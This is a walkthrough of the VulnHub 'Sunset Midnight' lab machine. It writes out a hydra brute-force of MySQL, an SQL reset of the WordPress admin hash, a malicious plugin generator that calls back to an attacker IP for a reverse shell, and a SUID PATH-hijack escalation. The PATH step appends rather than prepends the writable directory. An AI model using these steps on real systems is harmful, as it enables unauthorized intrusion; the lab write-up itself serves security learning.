PGP:SunsetMidnight

彤彤学安全
98 阅读3分钟

本文已参与「新人创作礼」活动,一起开启掘金创作之路

Scan

nmap

nmap 192.168.61.88 -p 22,80,3306 -sCV
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-13 09:26 CST
Nmap scan report for 192.168.61.88
Host is up (0.23s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:fe:0b:8b:8d:15:e7:72:7e:3c:23:e5:86:55:51:2d (RSA)
|   256 fe:eb:ef:5d:40:e7:06:67:9b:63:67:f8:d9:7e:d3:e2 (ECDSA)
|_  256 35:83:68:2c:33:8b:b4:6c:24:21:20:0d:52:ed:cd:16 (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to http://sunset-midnight/
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
3306/tcp open  mysql   MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
|   Thread ID: 19
|   Capabilities flags: 63486
|   Some Capabilities: FoundRows, Support41Auth, Speaks41ProtocolOld, ConnectWithDatabase, SupportsTransactions, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, IgnoreSigpipes, InteractiveClient, DontAllowDatabaseTableColumn, ODBCClient, LongColumnFlag, SupportsLoadDataLocal, SupportsCompression, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: Vuh-DM7l9vj1T3B0jGdB
|_  Auth Plugin Name: mysql_native_password
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.56 seconds

80port

image-20220513135202630.png
Pay attention to add host sunset-midnight to /etc/hosts , if you cannot open the website .

After view you will found this is a wordpress site .

But when using wpscan to try to find something ,I got nothing .

wpscan --url http://sunset-midnight                               
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ /  / / |  ___/ ___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             /  /   |_|    |_____/ ___|__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.20
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

3306 port

So I turn to 3306 . Trying weak password by hydra . And guessing the root as username .

hydra -s 3306 -l root -P /usr/share/wordlists/rockyou.txt -t 16 192.168.61.88 mysql

image-20220513135641702.png

Surprisingly, I got a password root:robert . Now I can login mysql to change the wordpress administrator password

shell as www

Easily I entered mysql as root .

image-20220513140005690.png

There was only admin in wp_user table . Although I got the password hash ,I could not encrypt it .

image-20220513140110415.png

So I changed the admin'password to 123456 . And this site could be used to generate a hash by the way of wordpress . www.useotools.com/wordpress-p… Or you can just use MD5.

UPDATE `wp_users` SET `user_pass` = '$P$BtmTpjEYj/n0MwVQ0VAhF5m6uTTEyd0' WHERE ID = 1

image-20220514093613193.png

I used admin:123456 logging in panel . But when I want to insert php reverse code to the wedget as usual, it showed me

image-20220514111346606.png

Google for reasons, but nothing was found . So I had to looking for other way .

Finnally , I found a way to solve this solution from VulnHub Sunset Midnight Walkthrough (doyler.net) Thanks bro .

I use this malicious plugin . But pay attention this script will use MSF , So if you are in OSCP , take care .

git clone https://github.com/wetw0rk/malicious-wordpress-plugin

python wordpwn.py 192.168.49.117 4444 Y

Then upload this plugin to WP , in Plugins-->add new --> upload

After upload successfully , view

sunset-midnight/wp-content/plugins/malicious/wetw0rk_maybe.php

to get this reverse shell.

image-20220514112355418.png

Pay attention again , It will use MSF .

Shell as jose

After enter the wordpress service . The first thing is look though the wp-config.php

/** MySQL database username */
define( 'DB_USER', 'jose' );

/** MySQL database password */
define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' );

At here ,you will find jose’s password.

image-20220514110810401.png

And then logged in smoothly .

Privilge Escalation to root

When I tried to find some binaries with SUID .

find / -perm -u=s -type f 2>/dev/null

image-20220514120504434.png

I found two interesting binaries . The one is dmcrypt-get-device with CVE-2017-6964 . But it seams like a rabbit hole because there was no exp on it .

Then I turned to status , it was a user defined binary . And it will call service as root .

image-20220514121036636.png

So I created a file named service . And write /bin/sh in it .

echo "/bin/sh" > service
export PATH=$PATH:/home/jose # add a dir which can be changed to PATH
chmod +x service #give service x pri

image-20220514121324811.png

\

avatar
文章
阅读
粉丝